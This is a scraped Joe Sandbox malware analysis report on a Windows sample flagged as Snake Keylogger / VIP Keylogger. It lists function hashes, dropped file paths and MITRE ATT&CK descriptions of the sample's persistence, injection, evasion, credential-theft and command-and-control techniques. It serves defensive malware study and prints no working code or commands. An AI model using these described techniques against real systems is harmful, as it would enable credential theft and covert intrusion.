Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 50fe57801d9b6863d1fc9f3e7a23957f72d65cb320c51c8dd8f07e56d6afcb26
Instruction ID: 2405a0fc1167dd127720c952fb5ee47d67db0407c9c459e138ab1658a17c8a22
Opcode Fuzzy Hash: 50fe57801d9b6863d1fc9f3e7a23957f72d65cb320c51c8dd8f07e56d6afcb26
Instruction Fuzzy Hash: 0911F2B5800348DFDB10DF9AC889BEEBBF8EB48314F108819E558A7200C379A944CFA5

Function 09017ED8 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 09017F3D

Memory Dump Source

Source File: 0000000A.00000002.2116558956.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9010000_AcEnrS.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 5ab8a02d5368c1fd074415263afa85faaefe55031a96f0b3f0e05193979ef234
Instruction ID: bd4cc543d503f403b1fe50984ae62aaea19b95b28c73ee503db6bd7af31eb839
Opcode Fuzzy Hash: 5ab8a02d5368c1fd074415263afa85faaefe55031a96f0b3f0e05193979ef234
Instruction Fuzzy Hash: CD1100B98003488FDB10DF99C585BDEBFF8FB48314F20881AE558A3200C379A584CFA0

Function 007BD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110056558.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7bd000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d135491a28640cdc6b0c84c74348062b7e9c3d62b6858eae0a2d8888bb3370e7
Instruction ID: 769b61b43a111f42d11be76e557e33558b7e16c0263a06c476a61acd39776f1e
Opcode Fuzzy Hash: d135491a28640cdc6b0c84c74348062b7e9c3d62b6858eae0a2d8888bb3370e7
Instruction Fuzzy Hash: 582121B1100284DFCB25DF14C9C0B66BF65FB98324F20C569ED090B256D33EEC06CAA2

Function 007BD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110056558.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7bd000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 986da1b07ddc21950c7c045e7f6c23e4b63036088990d3ed5ed7cc7d4eda8858
Instruction ID: 2ca7efd5adad3d899540a4983dfd0770bb5e03f1638046642df594da84d80d4d
Opcode Fuzzy Hash: 986da1b07ddc21950c7c045e7f6c23e4b63036088990d3ed5ed7cc7d4eda8858
Instruction Fuzzy Hash: 382100B1500244DFCB25DF14D9C0F66BF65FF98318F20C569E9090B256D33ADC26DAA2

Function 00ACD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110645860.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_acd000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f604e262491ca05cd32ce5ae87f69f844d00ba8856faf7edbe3d18a50482ec7
Instruction ID: c77ec993e05cba6791420f529ddcb65ec817d1b6d5c346f168420cf43e3dc5b7
Opcode Fuzzy Hash: 6f604e262491ca05cd32ce5ae87f69f844d00ba8856faf7edbe3d18a50482ec7
Instruction Fuzzy Hash: 0A21D075604204EFCB14DF28D984F26BFA5FB88314F20C57DD94A4B296C33AD807CA62

Function 00ACD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110645860.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_acd000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e2b68da844d8805b9334ebb9972e6009d08079dd8c2276c965d87483ae4525
Instruction ID: f6218b5563d2ff2f4df1068c2c59886c36c7bf632f4ebf715e84dca399f860d7
Opcode Fuzzy Hash: f7e2b68da844d8805b9334ebb9972e6009d08079dd8c2276c965d87483ae4525
Instruction Fuzzy Hash: 9A2180755093808FCB02CF24D994B15BF71EB46314F29C5EED8498F6A7C33A980ACB62

Function 007BD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110056558.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7bd000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 7a434b1f62f5b207993b5b181437445998d333b09beec4ae2a346f211e45cd9c
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: AE112672404280CFCB22CF10D5C4B56BF72FF98314F24C6A9D8490B256C33AD86ACBA2

Function 007BD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2110056558.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7bd000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 7abddb45a6cc6b759e1eed7b3dd9357c3956b1c4a4d3fcfee1e0f3f433182eb3
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 51112672404280CFCB12CF00D5C4B56BF72FB94324F24C6A9DD090B256C33AE85ACBA2

Analysis Process: AcEnrS.exePID: 7708, Parent PID: 7400COMMON

Executed Functions

Function 00F829D0 Relevance: 8.4, Strings: 6, Instructions: 850COMMON

Download Yara Rule

Strings

Xaq, xrefs: 00F83CF6
Xaq, xrefs: 00F83CCD
Xaq, xrefs: 00F82AD8
Xaq, xrefs: 00F82A9E
Xaq, xrefs: 00F82BA4
Xaq, xrefs: 00F82B57

Memory Dump Source

Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
API String ID: 0-499371476
Opcode ID: 1c50f25504c5171b75e573540954fc99c14363edefe70895e5cc28a3fc24eadc
Instruction ID: 3590df37b4178c6432e96b1c0df9abd25a6f0156f7c284e135dac15e46b7f0bf
Opcode Fuzzy Hash: 1c50f25504c5171b75e573540954fc99c14363edefe70895e5cc28a3fc24eadc
Instruction Fuzzy Hash: 2E420662D4D3C19FDB5386784CB91DB7FF19F53600B1A44EFC8C282296E968A447E722

Function 00F83E09 Relevance: 2.9, Strings: 2, Instructions: 431COMMON

Download Yara Rule

Strings

$]q, xrefs: 00F83E2E
Xaq, xrefs: 00F83E47

Memory Dump Source

Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd

Similarity

API ID:
String ID: Xaq$$]q
API String ID: 0-1280934391
Opcode ID: 91a40cfae22835488aeb459d2b30cd4a195082262617028b51a41e40a7c2eb4c
Instruction ID: 9ea5a5809ff0c4cea876672592c9606dccf074ef39dc8722928250e96ffbe554
Opcode Fuzzy Hash: 91a40cfae22835488aeb459d2b30cd4a195082262617028b51a41e40a7c2eb4c
Instruction Fuzzy Hash: C8F19C74F04249CFCB08EFB9C8946AEBBB2FF88700B14856DE406AB354CB359846DB51

Function 00F80CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LR]q, xrefs: 00F80F19

Memory Dump Source

Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd

Similarity

API ID:
String ID: LR]q
API String ID: 0-3081347316
Opcode ID: d2715159b6c57e27e9a5e7c796b6df4ee88a8d86764d1bf2c0b09b781bee6f01
Instruction ID: 17b1b527b2cb15cc1da5ca03d8429478b58719d60d9bf71cb804b0a74f463ab2
Opcode Fuzzy Hash: d2715159b6c57e27e9a5e7c796b6df4ee88a8d86764d1bf2c0b09b781bee6f01
Instruction Fuzzy Hash: F2528574A01219CFCB64EF64ED94A9DBBB6FF48301F1085A5D409A7368DB346E86DF80

Function 00F841A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 250843b7d5d8ac65a3463b43dabf0c3e33f6ba9132321c26709b3cef60f7b67e
Instruction ID: f17dab8d2084d3b6d2571fbef8f4b3d0cc5834b53baf63c126764645f80994e4
Opcode Fuzzy Hash: 250843b7d5d8ac65a3463b43dabf0c3e33f6ba9132321c26709b3cef60f7b67e
Instruction Fuzzy Hash: AA51AA74E01308CFCB48DFA9D99499DBBF2FF89300B208469E405AB364DB35A946CF50

Function 00F828F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b9867dcfd26e00e85f2aeba55f92d240f16e6724b6b7c6e5248641e27d67e1
Instruction ID: a433b313ad6b3456862c8d46d0f35f972e98383e832a4816dc1202af5d086c0e
Opcode Fuzzy Hash: b3b9867dcfd26e00e85f2aeba55f92d240f16e6724b6b7c6e5248641e27d67e1
Instruction Fuzzy Hash: C8218E35E001059FCB64EF68D840AEE37A5EBA9364F208459D80A9B240DB34FE47DBD2

Function 00F84285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e3176f90d343e6becaa87e50be520bcc5bf33f4947140f2cd32daf8987c6089
Instruction ID: c7b2b779ed2dd2bfb12300e5f7f7166ddc2306c64b81ab10901fd62eaf798ce8
Opcode Fuzzy Hash: 9e3176f90d343e6becaa87e50be520bcc5bf33f4947140f2cd32daf8987c6089
Instruction Fuzzy Hash: 0E31A678E11209CFCB54EFA8D99499DBBF2FF49304B208469E819AB365D735AD06CF40

Function 00F82800 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62fc0a1714483c2d80f342ed7104f287ca0af7f8a5bd5e28962cb27b2cd61b14
Instruction ID: 3a7479c752e41ba3b6c9ae575e59b0a3afb8ea9b8627e378d7fb65fe5137b609
Opcode Fuzzy Hash: 62fc0a1714483c2d80f342ed7104f287ca0af7f8a5bd5e28962cb27b2cd61b14
Instruction Fuzzy Hash: 8811C0B4D0060A8FCF40EFA9D9845EEBBF4FF09304F10452AD909B2214EB355A85CFA1

Function 00F828A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2401792844.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_f80000_AcEnrS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69bf914b9b7ecdb3d4919239f17c952dd1db135a9da646b72a290725735eab10
Instruction ID: 90d8239c73c71bc798a5dbb5fb963e3b69f47fdb56945e998d87f80503d64ed1
Opcode Fuzzy Hash: 69bf914b9b7ecdb3d4919239f17c952dd1db135a9da646b72a290725735eab10
Instruction Fuzzy Hash: C8E02031D54356CBC712D7F09C140EEBB34EDC6211708455BC0A537051EB30261AC352

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report WIpGif4IRrFfamQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_AcEnrS.exe_2dc6f3615384b0b820f49419bdfb62c78a16395_3aa1fe28_e2f6bfb4-8e3b-4930-9192-70b04bf6ea22\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D66.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EDE.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F2D.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AcEnrS.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\WIpGif4IRrFfamQ.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_141esvdq.2sr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mslla4e.bun.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axf4oqit.uho.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsfpo23f.5dm.psm1

Windows Analysis Report
WIpGif4IRrFfamQ.exe

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre